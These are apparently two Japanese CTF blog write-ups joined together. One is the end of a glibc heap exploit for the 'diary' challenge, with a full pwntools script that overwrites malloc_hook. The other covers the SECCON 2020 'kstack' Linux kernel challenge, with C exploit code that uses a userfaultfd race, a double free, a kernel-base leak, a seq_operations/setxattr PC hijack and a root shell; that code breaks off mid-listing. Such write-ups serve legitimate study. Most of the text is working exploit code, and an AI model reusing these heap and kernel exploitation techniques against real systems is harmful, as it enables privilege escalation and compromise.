先程の main_arena の書き換えに於いて適当な位置を 0x70 サイズの fastbin が指すようにしておく。さらにそいつが指す先に有る fake chunk の fd を他のメモ帳を使って書き換えることで、fastbinのfdを自由な値にすることができる。これによって malloc_hook を指させることにする。

最大の障壁は、0x90サイズの fastbin が存在しないということである。最初に unsorted を生成するために tcache[0x90] には現在7つのchunkが繋がっている。fastbinは0x20~0x80であるからこそ、これで unsorted が生成されるわけである。だが、main_arena の forge による fastbin の書き換えでは 0x90 のchunkは作れないため、0x70等のサイズを使用する必要が有る。だが、それらのサイズを使うと今度は fastbin->fd を書き換える際に malloc consolidation が発生し、せっかく書き換えたfastbinが全てtcacheへぶっ飛んでいってしまう。

これを回避するために、予め互いにリンクした fake chunk(0x70) を用意しておく。そして main_arena の書き換えによって、root-> 大量のリンクリスト-> libcbaseをリークした後に生成したfake fastbin-> malloc_hook というリストを作り出す。これによって、consolidation が発生した際に用意した大量のchunksを tcache に持っていき、所望のfdをもつchunkはfastbinに格納させることができる。

この辺をどうやるか、それは勿論決まっている。

HEAP FENG SHUI です！！！！！！！！ 

6: exploit

#!/usr/bin/env python
#encoding: utf-8;

from pwn import *
from smallkirbypwn import *
import sys

FILENAME = "./diary"
LIBCNAME = "./libc-2.29.so"

hosts = ("diary.balsnctf.com","localhost","localhost")
ports = (10101,12300,23947)
rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost 
rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
context(os='linux',arch='amd64')
binf = ELF(FILENAME)
libc = ELF(LIBCNAME) if LIBCNAME!="" else None

class _IO_FILE(object):
  def __init__(self, 
      read_ptr=None, read_end=None, read_base=None,
      write_base=None, write_ptr=None, write_end=None,
      buf_base=None, buf_end=None,
      save_base=None, backup_base=None, save_end=None,
      lock=None, wide_data=None):
    self.read_ptr = read_ptr if read_ptr!=None else 0
    self.read_end = read_end if read_end!=None else 0
    self.read_base = read_base if read_base!=None else 0
    self.write_base = write_base if write_base!=None else 0
    self.write_ptr = write_ptr if write_ptr!=None else 0
    self.write_end = write_end if write_end!=None else 0
    self.buf_base = buf_base if buf_base!=None else 0
    self.buf_end = buf_end if buf_end!=None else 0
    self.save_base = save_base if save_base!=None else 0
    self.backup_base = self.backup_base if backup_base!=None else 0
    self.save_end = save_end if save_end!=None else 0
    self.flag = 0xfbad208b
    self.markers = 0
    self.chain = 0 # stdin addr if stdout
    self.fileno = 0 # 1 if stdout
    self.fileno2= 0
    self.old_offset = 0xffffffffffffffff
    self.lock = lock if lock!=None else 0
    self.offset = 0xffffffffffffffff
    self.code_cvt = 0
    self.wide_data = wide_data if wide_data!=None else 0
    self.freeres_list = 0
    self.freeres_buf = 0
    self.pad5 = 0
    self.mode = 0xffffffff
    return None

  def gen(self):
    pay = b""
    pay += p64(self.flag)
    pay += p64(self.read_ptr) + p64(self.read_end) + p64(self.read_base)
    pay += p64(self.write_base) + p64(self.write_ptr) + p64(self.write_end)
    pay += p64(self.buf_base) + p64(self.buf_end)
    pay += p64(self.save_base) + p64(self.backup_base) + p64(self.save_end)
    pay += p64(self.markers)
    pay += p64(self.chain)
    pay += p32(self.fileno) + p32(self.fileno2)
    pay += p64(self.old_offset)
    pay += p64(0x000000000a000000) # cur_column + vtable_offset + shortbuf
    pay += p64(self.lock)
    pay += p64(self.offset)
    pay += p64(self.freeres_list) + p64(self.freeres_buf) + p64(self.pad5)
    pay += p32(self.mode) + p32(0)
    return pay

class _IO_FILE_plus(_IO_FILE):
  def __init__(self,
      read_ptr=None, read_end=None, read_base=None,
      write_base=None, write_ptr=None, write_end=None,
      buf_base=None, buf_end=None,
      save_base=None, backup_base=None, save_end=None,
      lock=None, wide_data=None, vtable=None):
    super(_IO_FILE_plus, self).__init__(
      read_ptr, read_end, read_base,
      write_base, write_ptr, write_end,
      buf_base, buf_end,
      save_base, backup_base, save_end,
      lock, wide_data)
    self.vtable = vtable if vtable!=None else 0

  def gen(self):
    pay =  super(_IO_FILE_plus, self).gen()
    pay += p64(0) * 4
    pay += p64(self.vtable)
    return pay

class main_arena:
  def __init__(self):
    self.mutex = 0
    self.flags = 0
    self.have_fastbinchunks = 0
    self.fastbins = {}
    return None

  def set(self, size, addr):
    self.fastbins[hex(size)] = addr
    return self

  def gen_fastbinchunks(self):
    pay = b""
    for i in range(8):
      if hex(i*0x10+0x20) in self.fastbins:
        pay += p64(self.fastbins[hex(i*0x10+0x20)])
      else:
        pay += p64(0)
    return pay

  def gen(self):
    pay = b""
    pay += p32(self.mutex) + p32(self.flags)
    pay += p32(self.have_fastbinchunks)
    pay += p32(0) # hole
    pay += self.gen_fastbinchunks()
    return pay


## utilities #########################################

def hoge(ix):
  global c
  c.recvuntil("choice : ")
  c.sendline(str(ix))

def _show():
  global c
  hoge(1)

def _write(_size, _content, stop=False):
  global c
  hoge(2)
  c.recvuntil("Length : ")
  c.send(str(_size))
  if stop:
    return
  c.recvuntil("Content : ")
  c.send(_content)

def _read(page):
  global c
  hoge(3)
  c.recvuntil("Page : ")
  c.send(str(page))

def _edit(page, content):
  global c
  hoge(4)
  c.recvuntil("Page : ")
  c.sendline(str(page))
  c.recvuntil("Content : ")
  c.send(str(content))

def _tear(page):
  global c
  hoge(5)
  c.recvuntil("Page : ")
  c.send(str(page))

## exploit ###########################################

def exploit():
  global c
  ds = 0x80
  name = "A"*0x20

  # setup name
  c.recvuntil("name : ")
  c.send(name)

  # leak heapbase
  _write(ds, "B"*ds) # 0
  _show()
  c.recvuntil("A"*0x20)
  leak = unpack(c.recvline().rstrip().ljust(8,'\x00'))
  heapbase = leak - 0x260
  print("[+] leaked: "+hex(leak))
  print("[+] heapbase: "+hex(heapbase))

  # generate unsorted
  sz = 0x31
  for i in range(0x8): # 1..0x9
    if i==0: # to fulfill fastbin(0x80)
      _write(ds, p32(0) + p64(0) +  (p64(heapbase+0x300)+p64(0x81)) + (p64(heapbase+0x310)+p64(0x81))+(p64(heapbase+0x320)+p64(0x81)) + (p64(heapbase+0x330)+p64(0x81)) + (p64(heapbase+0x340)+p64(0x81)) + (p64(heapbase+0x350)+p64(0x81)) + (p64(heapbase+0x380)+p64(0x81)))
    elif i==1:
      _write(ds, p32(0) + p64(0x71) +  (p64(heapbase+0x610)+p64(0x81)))
    else:
      _write(ds, p32(0) + (p64(0x71)+p64(0))*((ds-4)//0x10 - 2) + (p64(sz)+p64(0))*2)
  for i in range(0x8):
    _tear(i) # generate unsorted at heapbase+0x640

  # forge main_arena
  mp = main_arena()
  mp.set(0x30, heapbase + 0x620).set(0x70, heapbase + 0x600).set(0x80, heapbase+0x300)
  pay = b""
  pay += _IO_FILE_plus(vtable=0).gen()[4:]
  pay += p8(0x40) * 0x130 # pad wide_data
  pay += p64(0x81)*2 # fake sz for overwriting malloc_hook
  pay += p64(0x00)*2 # fake fd for overwriting malloc_hook
  pay += p64(0) # malloc_hook
  pay += p64(0)
  pay += mp.gen()
  _edit(-6, pay)

  # leak libcbase
  _write(0x24, "A"*(0x24)) # 0xa@heapbase+0x660
  _read(0x9)
  c.recvuntil("A"*0x24)
  leak =  unpack(c.recvline().rstrip().ljust(8,'\x00'))
  libcbase = leak - 0x1e4ca0
  print("[+] leak: "+hex(leak))
  print("[+] libcbase: "+hex(libcbase))

  # overwrite fastbin's fd
  ogs = [addr + libcbase for addr in [0xe237f, 0xe2383, 0xe2386, 0x106ef8]]
  _write(0x60, p32(0) + p64(0x81) + p64(libcbase + 0x1e4c10)) # @heapbase+0x610 consolidate into tcache
  _write(0x70, "A"*0x10) # connect malloc_hook into unsorted(0x80)
  _write(0x70, "A"*0xc + p64(ogs[3])) # overwrite malloc_hook

  # boomb
  _write(0x60, "X", stop=True)


## main ##############################################

if __name__ == "__main__":
    global c
    
    if len(sys.argv)>1:
      if sys.argv[1][0]=="d":
        cmd = """
          set follow-fork-mode parent
        """
        c = gdb.debug(FILENAME,cmd)
      elif sys.argv[1][0]=="r":
        c = remote(rhp1["host"],rhp1["port"])
      elif sys.argv[1][0]=="v":
        c = remote(rhp3["host"],rhp3["port"])
    else:
        c = remote(rhp2['host'],rhp2['port'])
    exploit()
    c.interactive()

7: アウトロ

まじで、Verilogめっちゃ苦手です

ハードウェアの気持ちを考えて書くことができない

続く...

• 1: イントロ
• 2: 静的解析
• 2: Vulns
• 3: Leak kernbase via shm_file_data
• 4: Double free via failure of copy_from_user
• 4: Rule PC via seq_operations and setxattr
• 5: Root via stack pivot
• 6: Exploit
• 7: アウトロ

1: イントロ

いつぞや開催された SECCON CTF 2020。

そのpwn問題を全部解き直すシリーズpart.2です。前回までのエントリは以下を参照してください。

smallkirby.hatenablog.com

本エントリでは kernel exploit 問題である kstack を解いていきます。

2: 静的解析

配布ファイルは以下の通り：

• bzImage: Linux version 4.19.98 (ptr@medium-pwn) (gcc version 8.3.0 (Buildroot 2019.11-git-00204-gc2417843c8)) #18 0GNU/Linux 
• rootfs.cpio: initram
• start.sh: QEMU起動スクリプト。NICはe1000。SMEP・KASLR有効。
• kstack.c: LKMソースファイル。後述。

本LKMは stack という名前のプロセスファイルをインストールする。 fops には unlocked_ioctl のみが登録されており、簡易的な PUSH/POP をシミュレートする。

2: Vulns

unlocked_ioctl として登録されている proc_ioctl は内部で copy_from_user/copy_to_user を呼び出すのだが、この際にロックが取られないため race condition が発生する可能性が有る。copy_from_user/copy_to_user はそれ自体がそれなりに重い操作であるため、何万回か繰り返せばまぁそのうち競合するだろうが、今回は確実に競合を発生させるため、userfaultfd を用いて copy_from_user がユーザランドのページにアクセスした際にフォルトを発生させ、処理をユーザランドに戻すことにする。

userfaultfd を用いた race condition exploit については、以下で詳しく取り扱っている。

smallkirby.hatenablog.com

3: Leak kernbase via shm_file_data

まずは試しに POP を2回行って double free を起こしてみる。

そのためにはまず、適当な値をPUSHしておく。

その後、別スレッドにおいて __NR_userfaultfd システムコール(libcにラッパはない為直接呼ぶ)で usefaultfd file descriptor を入手する。そのあと mmap で指定したアドレス(0x117117000)に領域を確保し、確保した領域を uffd に対する ioctl で監視する。

mmap領域が監視されている状態で、その領域に対してPOPを行う。lazy loadingのためにmmap領域は実際にはまだページが確保されていないから、このPOP内の copy_to_user でページフォルトが起こり、処理は指定したユーザランドのフォルトハンドラに移る。このPOPを一旦放置した状態でフォルトハンドラにおいてもう一度POPを行えば無事に100%の確率で double free が発生する。

今回モジュール内で使用されている Element 構造体は全体のサイズが 0x18bytes である。よって、これは free された後に kmalloc-32 に入ることになる。このスラブに入る構造体の中でなにかいいものがないかを以下で探す。

ptr-yudai.hatenablog.com

ここでは shm_file_data 構造体を利用する。これは shmat シスコールの内部で生成される構造体である。

ここで *sfd が struct shm_file_data である。

そのサイズは 0x20bytes であり、kmalloc-32にのることがわかる。

double free -> push -> shm_file_data生成 ->  pop の順に操作することで shm_file_data の0x8~0x10byte目の値が読めるはずなのだが、何度やっても上手くpopされなかった。それもそのはずで、POPの際には以下のように pid の確認をしているのを失念していた。

というわけで、方向転換をする。

まず先に shm_file_data を kfree しておく。その後でPOPを行い、shm_file_data として使われていたスラブオブジェクトを Element 構造体として確保する。pid などを設定した後 copy_to_user を行うのだが、ここでフォルトを発生させてハンドラに処理を移す。その内部でPUSHを行うことで、pid は適切に設定されているものの Element.value に該当するデータは前の shm_file_data 内のポインタが残っており、これをleakすることができる。 

ここで shm_file_data をkfree する方法だが、shmctl(IPC_RMID)をすることで該当セグメントに対して破棄済みの印をつけることができる。その後でセグメントが破棄されるわけなんだが、正確にどのタイミングで破棄されるのかが分からなかった。大体の場合はプロセスが死んだ直後に shm_release が呼ばれるのだが、呼ばれない場合もごく稀にあった。上手くいった例が以下のとおりである(デバッグ目的で自前の巨大kernelを使っているためブートに異様に時間がかかっている+これまたデバッグ目的でrootユーザを使用している)

まぁ、安定はしないが取り敢えずleakはできている。90%くらいは成功するからこれでいいだろう。

ここまでのコードは以下の通り。

#define _GNU_SOURCE
#include<sys/types.h>
#include<stdio.h>
#include<linux/userfaultfd.h>
#include<pthread.h>
#include<errno.h>
#include<stdlib.h>
#include<fcntl.h>
#include<signal.h>
#include<string.h>
#include<sys/mman.h>
#include<sys/syscall.h>
#include<poll.h>
#include<unistd.h>
#include<string.h>
#include<sys/ioctl.h>
#include<sys/prctl.h>
#include<sys/shm.h>

#define ulong unsigned long
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)

#define PAGE 0x1000

ulong user_cs,user_ss,user_sp,user_rflags;
int fd;                     // file descriptor of /dev/note
char *addr = 0x117117000;    // memory region supervisored
char *shmaddr = 0x200200000;    // memory region shmat
const char *buf[0x1000];            // userland buffer
const unsigned long len = PAGE*0x10;  // memory length
unsigned long leak, kernbase;


void pop_shell(void)
{
  char *argv[] = {"/bin/sh",NULL};
  char *envp[] = {NULL};
  execve("/bin/sh",argv,envp);
}

static void save_state(void) {
  asm(
      "movq %%cs, %0\n"
      "movq %%ss, %1\n"
      "movq %%rsp, %2\n"
      "pushfq\n"
      "popq %3\n"
      : "=r" (user_cs), "=r" (user_ss), "=r"(user_sp), "=r" (user_rflags) : : "memory" 		);
}

#define POP     0x57ac0002
#define PUSH    0x57ac0001

struct Element{
  int owner;
  unsigned long value;
  struct Element *fd;
};

int _push(unsigned long *data)
{
  if(ioctl(fd, PUSH, data) < 0)
    errExit("_push");
  printf("[+] pushed %llx\n", *data);
  return 0;
}

int _pop(unsigned long *givenbuf)
{
  if(ioctl(fd, POP, givenbuf) < 0)
    errExit("_pop");
  printf("[+] poped %llx\n", *givenbuf);
  return 0;
}


static void call_shmat(void)
{
  int shmid;
  void *addr;
  pid_t pid;

  if((pid=fork()) == 0){
    if((shmid = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600))==-1)
      errExit("shmget fail");

    if((addr=shmat(shmid, NULL, SHM_RDONLY))==-1)
      errExit("shmat fail");

    if(shmctl(shmid, IPC_RMID, NULL)==-1)
      errExit("shmctl");

    printf("[ ] Success call_shmat: %p\n", addr);
    printf("[ ] Child is exiting...\n");
    exit(0);
  }
  wait(pid);
  printf("[ ] Parent is returning...\n");
}

// cf. man page of userfaultfd
static void* fault_handler_thread(void *arg)
{
  puts("[+] entered fault_handler_thread");

  static struct uffd_msg msg;   // data read from userfaultfd
  struct uffdio_copy uffdio_copy;
  long uffd = (long)arg;        // userfaultfd file descriptor
  struct pollfd pollfd;         //
  int nready;                   // number of polled events
  unsigned long hogebuf;

  // set poll information
  pollfd.fd = uffd;
  pollfd.events = POLLIN;

  // wait for poll
  puts("[+] polling...");
  while(poll(&pollfd, 1, -1) > 0){
    if(pollfd.revents & POLLERR || pollfd.revents & POLLHUP)
      errExit("poll");

    // read an event
    if(read(uffd, &msg, sizeof(msg)) == 0)
      errExit("read");

    if(msg.event != UFFD_EVENT_PAGEFAULT)
      errExit("unexpected pagefault");

    printf("[!] page fault: %p\n",msg.arg.pagefault.address);

    //** Now, another thread is halting. Do my business. **//
    puts("[+] pop before push!");
    _pop(&hogebuf); // leak shm_file_data->ipc_namespace
    leak = hogebuf;
    kernbase = leak-0xc38600;
    printf("[!] leaked: %llx\n", leak);
    printf("[!] kernbase(text): %llx\n", kernbase);


    // forge user buffer passed into copy_from_user(), which doesn't take a lock cuz called in unlock_ioctl
    uffdio_copy.src = buf;
    uffdio_copy.dst = msg.arg.pagefault.address & ~(PAGE-1);
    uffdio_copy.len = PAGE;
    uffdio_copy.mode = 0;
    if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
      errExit("ioctl-UFFDIO_COPY");

    break;
  }

  puts("[+] exiting fault_handler_thrd");
}

// cf. man page of userfaultfd
void register_userfaultfd_and_halt(void)
{
  puts("[+] registering userfaultfd...");

  long uffd;      // userfaultfd file descriptor
  pthread_t thr;  // ID of thread that handles page fault and continue exploit in another kernel thread
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  int s;

  // create userfaultfd file descriptor
  uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); // there is no wrapper in libc
  if(uffd == -1)
    errExit("userfaultfd");

  // enable uffd object via ioctl(UFFDIO_API)
  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    errExit("ioctl-UFFDIO_API");

  // mmap
  puts("[+] mmapping...");
  addr = mmap(addr, len, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); // set MAP_FIXED for memory to be mmaped on exactly specified addr.
  puts("[+] mmapped...");
  if(addr == MAP_FAILED)
    errExit("mmap");

  // specify memory region handled by userfaultfd via ioctl(UFFDIO_REGISTER)
  uffdio_register.range.start = addr;
  uffdio_register.range.len = PAGE*0x10;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    errExit("ioctl-UFFDIO_REGISTER");

  s = pthread_create(&thr, NULL, fault_handler_thread, (void*)uffd);
  if(s!=0){
    errno = s;
    errExit("pthread_create");
  }

  puts("[+] registered userfaultfd");
}


int main(void)
{
  unsigned long secret;
  unsigned long content_ptr;
  unsigned long modulebase;
  unsigned long dif_main_buf, dif_notes_array;
  unsigned long page_offset_base;
  unsigned long rip_call_copy_to_user;
  unsigned long addr_copy_to_user;
  signed long rel_jmp_offset;
  unsigned long kern_textbase;
  void *tmp_addr;
  unsigned char *addr_cred;
  unsigned long addr_cred_in_task_struct;
  unsigned long tmp_buf = 0xdeadbeef;

  unsigned long diff_copy_to_user = 0x353ee0;

  // save state
  save_state();

  // open miscdevice
  if((fd=open("/proc/stack",O_RDONLY))<0)
    errExit("open-/proc/stack");

  // leak secret
  register_userfaultfd_and_halt();
  sleep(1);

  call_shmat(); // kalloc and kfree shm_file_data structure at kmalloc-32

  _push(addr); // invoke fault

  return 0;
}

4: Double free via failure of copy_from_user

さて、ここまでで kernbase のリークは済んだ。このあとはPCを奪取する必要が有る。

上のプログラムではページフォルトをハンドルした後、処理が copy_to_user に戻り、以降はほぼ正常に動作する。但し、中断したPUSHで扱っている Element インスタンスはPOPにおいて kfree されている。ここで copy_from_user が失敗した場合、以下の処理でさらに同じインスタンスが kfree されて double free が生じる。

copy_from_user を失敗させるためには、その領域に対してアクセス権限がなければよいため、フォルトハンドラの内部において mprotect でページ権限を変更することにする。

こうしてユーザランドからの読み込みを失敗させると、以下のように EINVAL が返されて copy_from_user が失敗し、double free が生じる。

4: Rule PC via seq_operations and setxattr

double freeがあれば、PCを奪取することができるようになる。そのための条件は、1: 構造体内に関数ポインタを含むこと 2: 1と別に構造体内に任意の値を書き込めること。さて、先程の shm_file_data 構造体を考えると、このどちらの条件も満たしていないことが分かる。よって、こいつとは kernbase leak を最後におさらばする👋👋👋👋 (というかひねくれずに最初から以下の常套手段を使えばよかったのに...)

構造体内に関数ポインタを含み kmalloc-32 に入る構造体として seq_operations を用いる。これは4つの関数ポインタを保持し、任意のタイミングで呼び出すことができるため victim 側の構造体として利用する。

任意の値の書き込みには定番の setxattr を呼び出す。確保するチャンクのサイズやそこに書き込む値を自由に制御することができるため、うってつけの関数である。尚、確保されたオブジェクトは関数の終了時に kfree される。(今回は別に問題ない)

この2つとdouble freeを組み合わせて試しにPCを 0xDEADBEEF に飛ばしてみるコードが以下の通り。

#define _GNU_SOURCE
#include<sys/types.h>
#include<stdio.h>
#include<linux/userfaultfd.h>
#include<pthread.h>
#include<errno.h>
#include<stdlib.h>
#include<fcntl.h>
#include<signal.h>
#include<string.h>
#include<sys/mman.h>
#include<sys/syscall.h>
#include<poll.h>
#include<unistd.h>
#include<string.h>
#include<sys/ioctl.h>
#include<sys/prctl.h>
#include<sys/shm.h>
#include<sys/xattr.h>

#define ulong unsigned long
#define errExit(msg) do { perror("[ERROR EXIT]\n"); \
                          perror(msg); \
                          exit(EXIT_FAILURE); \
                     } while (0)

#define PAGE 0x1000

ulong user_cs,user_ss,user_sp,user_rflags;
int fd;                     // file descriptor of /dev/note
char *addr = 0x117117000;    // memory region supervisored
char *shmaddr = 0x200200000;    // memory region shmat
const char *buf[0x1000];            // userland buffer
const unsigned long len = PAGE*0x10;  // memory length
unsigned long leak, kernbase;


void pop_shell(void)
{
  char *argv[] = {"/bin/sh",NULL};
  char *envp[] = {NULL};
  execve("/bin/sh",argv,envp);
}

static void save_state(void) {
  asm(
      "movq %%cs, %0\n"
      "movq %%ss, %1\n"
      "movq %%rsp, %2\n"
      "pushfq\n"
      "popq %3\n"
      : "=r" (user_cs), "=r" (user_ss), "=r"(user_sp), "=r" (user_rflags) : : "memory" 		);
}

#define POP     0x57ac0002
#define PUSH    0x57ac0001

struct Element{
  int owner;
  unsigned long value;
  struct Element *fd;
};

int _push(unsigned long *data)
{
  if(ioctl(fd, PUSH, data) < 0)
    if(errno == EINVAL){
      printf("[-] copy_from_user failed.\n");
      errno = 0;
    }else
      errExit("_push");

  // printf("[+] pushed %llx\n", *data); // data region can be mprotected to NON_PLOT, so don't touch it.
  return 0;
}

int _pop(unsigned long *givenbuf)
{
  if(ioctl(fd, POP, givenbuf) < 0)
    errExit("_pop");

  printf("[+] poped %llx\n", *givenbuf);
  return 0;
}


static void call_shmat(void)
{
  int shmid;
  void *addr;
  pid_t pid;

  if((pid=fork()) == 0){
    if((shmid = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600))==-1)
      errExit("shmget fail");

    if((addr=shmat(shmid, NULL, SHM_RDONLY))==-1)
      errExit("shmat fail");

    if(shmctl(shmid, IPC_RMID, NULL)==-1)
      errExit("shmctl");

    printf("[ ] Success call_shmat: %p\n", addr);
    printf("[ ] Child is exiting...\n");
    exit(0);
  }
  wait(pid);
  printf("[ ] Parent is returning...\n");
}

// cf. man page of userfaultfd
static void* fault_handler_thread(void *arg)
{
  puts("[+] entered fault_handler_thread");

  static struct uffd_msg msg;   // data read from userfaultfd
  struct uffdio_range uffdio_range;
  long uffd = (long)arg;        // userfaultfd file descriptor
  struct pollfd pollfd;         //
  int nready;                   // number of polled events
  unsigned long hogebuf;

  // set poll information
  pollfd.fd = uffd;
  pollfd.events = POLLIN;

  // wait for poll
  puts("[+] polling...");
  while(poll(&pollfd, 1, -1) > 0){
    if(pollfd.revents & POLLERR || pollfd.revents & POLLHUP)
      errExit("poll");

    // read an event
    if(read(uffd, &msg, sizeof(msg)) == 0)
      errExit("read");

    if(msg.event != UFFD_EVENT_PAGEFAULT)
      errExit("unexpected pagefault");

    printf("[!] page fault: %p\n",msg.arg.pagefault.address);

    //********* Now, another thread is halting. Do my business. **//
    // leak kernbase
    puts("[+] pop before push!");
    _pop(&hogebuf); // leak shm_file_data->ipc_namespace
    leak = hogebuf;
    kernbase = leak-0xc38600;
    printf("[!] leaked: %llx\n", leak);
    printf("[!] kernbase(text): %llx\n", kernbase);

    // change page permission and make fail copy_from_user
    mprotect(msg.arg.pagefault.address & ~(PAGE-1), PAGE, PROT_NONE);
    printf("[+] mprotected as PROT_NONE: %p\n", msg.arg.pagefault.address & ~(PAGE-1));
    uffdio_range.start = msg.arg.pagefault.address & ~(PAGE-1);
    uffdio_range.len = PAGE;
    if(ioctl(uffd, UFFDIO_UNREGISTER, &uffdio_range) == -1)
      errExit("ioctl-UFFDIO_UNREGISTER");
    printf("[+] unregistered supervisored region.\n");

    break;
  }

  puts("[+] exiting fault_handler_thrd");
}

// cf. man page of userfaultfd
void register_userfaultfd_and_halt(void)
{
  puts("[+] registering userfaultfd...");

  long uffd;      // userfaultfd file descriptor
  pthread_t thr;  // ID of thread that handles page fault and continue exploit in another kernel thread
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  int s;

  // create userfaultfd file descriptor
  uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); // there is no wrapper in libc
  if(uffd == -1)
    errExit("userfaultfd");

  // enable uffd object via ioctl(UFFDIO_API)
  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    errExit("ioctl-UFFDIO_API");

  // mmap
  puts("[+] mmapping...");
  addr = mmap(addr, len, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); // set MAP_FIXED for memory to be mmaped on exactly specified addr.
  puts("[+] mmapped...");
  if(addr == MAP_FAILED)
    errExit("mmap");

  // specify memory region handled by userfaultfd via ioctl(UFFDIO_REGISTER)
  uffdio_register.range.start = addr;
  uffdio_register.range.len = PAGE*0x10;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    errExit("ioctl-UFFDIO_REGISTER");

  s = pthread_create(&thr, NULL, fault_handler_thread, (void*)uffd);
  if(s!=0){
    errno = s;
    errExit("pthread_create");
  }

  puts("[+] registered userfaultfd");
}


int main(void)
{
  unsigned long secret;
  unsigned long content_ptr;
  unsigned long modulebase;
  unsigned long dif_main_buf, dif_notes_array;
  unsigned long page_offset_base;
  unsigned long rip_call_copy_to_user;
  unsigned long addr_copy_to_user;
  signed long rel_jmp_offset;
  unsigned long kern_textbase;
  void *tmp_addr;
  unsigned char *addr_cred;
  unsigned long addr_cred_in_task_struct;
  unsigned long tmp_buf = 0xdeadbeef;
  int sfd;

  unsigned long diff_copy_to_user = 0x353ee0;

  // save state
  save_state();

  //  open target proc file
  if((fd=open("/proc/stack",O_RDONLY))<0)
    errExit("open-/proc/stack");

  // set userfaultfd
  register_userfaultfd_and_halt();
  sleep(1);

  //
  call_shmat(); // kalloc and kfree shm_file_data structure at kmalloc-32
  _push(addr); // invoke fault

  // alloc seq_operations;
  if((sfd = open("proc/self/stat", O_RDONLY)) == -1)
    errExit("single_open");

  // overwrite seq_operations;
  char buf[0x20];
  for(int ix=0; ix!=4; ++ix)
    *(unsigned long*)(buf+ix*8) = 0xDEADBEEF;
  setxattr("/tmp", "SHE_IS_SUMMER", buf, 0x20, XATTR_CREATE);

  // pop rip to death
  read(sfd, buf, 0x10);

  return 0;
}

double free されて kmalloc-32 に対して同一オブジェクトが2つ繋がれているため、以下のように setxattr 内で kvmalloc によって確保されたチャンクが seq_operations として確保されたものと同一のものであることが分かるであろう。

但し、先頭8byteは kfree (厳密に言うと inline do_slab_free)において変更されるため、先頭8byteの値は自由にいじることができない前提でいる必要が有る。今回は int (*show)() だけ書き換えられれば良いため、問題なし。関数ポインタを 0xDEADBEEF で書き換えたために次に read する際にパニックが起きる。

5: Root via stack pivot

ここまででPCを奪取することができた。また、今回は SMEP のみ有効で SMAP 無効のため、kROPができる。

すごく普通のkROPのため省略するが、詳細は以下のエントリらへんに書いておいた気がする。

smallkirby.hatenablog.com

6: Exploit

自前カーネルのオフセットを利用している。オフセットを直せば問題環境にそのまま利用できるが、二度手間なのでしていない。

SMEP/KASLR有効。

#define _GNU_SOURCE
#include<stdio.h>
#include<linux/userfaultfd.h>
#include<pthread.h>
#include<errno.h>
#include<stdlib.h>
#include<fcntl.h>
#include<signal.h>
#include<string.h>
#include<sys/mman.h>
#include<sys/syscall.h>
#include<poll.h>
#include<unistd.h>
#include<string.h>
#include<sys/ioctl.h>
#include<sys/prctl.h>
#include<sys/shm.h>
#include<sys/xattr.h>

#define ulong unsigned long
#define errExit(msg) do { perror("[ERROR EXIT]\n"); \
                          perror(msg); \
                          exit(EXIT_FAILURE); \
                     } while (0)
#define WAIT(msg) puts(msg); \
                  fgetc(stdin);

#define PAGE 0x1000

ulong user_cs,user_ss,user_sp,user_rflags;
int fd;                     // file descriptor of /dev/note
char *addr = 0x117117000;    // memory region supervisored
char *shmaddr = 0x200200000;    // memory region shmat
const char *buf[0x1000];            // userland buffer
const ulong len = PAGE*0x10;  // memory length
ulong leak, kernbase;


void pop_shell(void)
{
  char *argv1[] = {"/bin/cat","/flag",NULL};
  char *envp1[] = {NULL};
  execve("/bin/cat",argv1,envp1);
  char *argv2[] = {"/bin/sh",NULL};
  char *envp2[] = {NULL};
  execve("/bin/sh",argv2,envp2);
}

static void save_state(void) {
  asm(
      "movq %%cs, %0\n"
      "movq %%ss, %1\n"
      "movq %%rsp, %2\n"
      "pushfq\n"
      "popq %3\n"
      : "=r" (user_cs), "=r" (user_ss), "=r"(user_sp), "=r" (user_rflags) : : "memory" 		);
}

#define POP     0x57ac0002
#define PUSH    0x57ac0001

struct Element{
  int owner;
  ulong value;
  struct Element *fd;
};

int _push(ulong *data)
{
  if(ioctl(fd, PUSH, data) < 0)
    if(errno == EINVAL){
      printf("[-] copy_from_user failed.\n");
      errno = 0;
    }else
      errExit("_push");

  // printf("[+] pushed %llx\n", *data); // data region can be mprotected to NON_PLOT, so don't touch it.
  return 0;
}

int _pop(ulong *givenbuf)
{
  if(ioctl(fd, POP, givenbuf) < 0)
    errExit("_pop");

  printf("[+] poped %llx\n", *givenbuf);
  return 0;
}


static void call_shmat(void)
{
  int shmid;
  void *addr;
  pid_t pid;

  if((pid=fork()) == 0){
    if((shmid = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600))==-1)
      errExit("shmget fail");

    if((addr=shmat(shmid, NULL, SHM_RDONLY))==-1)
      errExit("shmat fail");

    if(shmctl(shmid, IPC_RMID, NULL)==-1)
      errExit("shmctl");

    printf("[ ] Success call_shmat: %p\n", addr);
    printf("[ ] Child is exiting...\n");
    exit(0);
  }
  wait(pid);
  printf("[ ] Parent is returning...\n");
}

// cf. man page of userfaultfd
static void* fault_handler_thread(void *arg)
{
  puts("[+] entered fault_handler_thread");

  static struct uffd_msg msg;   // data read from userfaultfd
  struct uffdio_range uffdio_range;
